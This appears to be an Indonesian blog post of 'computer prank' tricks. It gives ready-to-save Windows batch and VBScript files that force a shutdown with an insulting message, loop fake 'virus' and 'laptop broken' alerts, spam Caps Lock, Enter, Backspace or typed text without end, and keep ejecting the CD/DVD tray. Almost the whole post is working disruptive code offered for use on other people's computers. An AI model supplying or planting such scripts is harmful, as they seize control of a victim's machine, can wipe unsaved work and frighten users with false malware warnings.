Trik Jail Komputer


Membuat komputer Shoutdown sendiri

@echo off
msg * isi pesan nya
shutdown -c "Error! You are too ******!" -s
Lalu save As dengan nama anda.bat type file : All file


Membuat Tombol Caps Lock menyala terus-menerus
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop




Lalu save As dengan nama :Dengan nama anda.vbs type file : All file
[Tombol CAPSLOCK akan menyala terus-menerus]

Membuat Pesan Jail

@ECHO off
:Begin
msg * labtop mu rusak
msg * awass viruss,
GOTO BEGIN
Lalu save As dengan nama anda.bat type file : All file



 Membuka Tutup CD/DVD room

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Lalu save As dengan nama Anda.vbs type file : All file
maka DVD/CD roomnya akan membuka dan menutup otomatis,

 Membuat script mucul terus menerus
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
Lalu save As dengan nama anda.vbs type file : All file

Membuat Tombol Backspace menjadi error

MsgBox "kembali ke menu sebelumnya"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

lalu save As- dengan nama : samsoftware-cyber.vbs type file:All file

 Cara Membuat menulis pesan dengan sendirinya

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "pesan anda"
loop
lalu save As- dengan nama anda.vbs type file:All file
Share this article :

Post a Comment

 
Support : | |
© TEKNOLOGI INFORMASI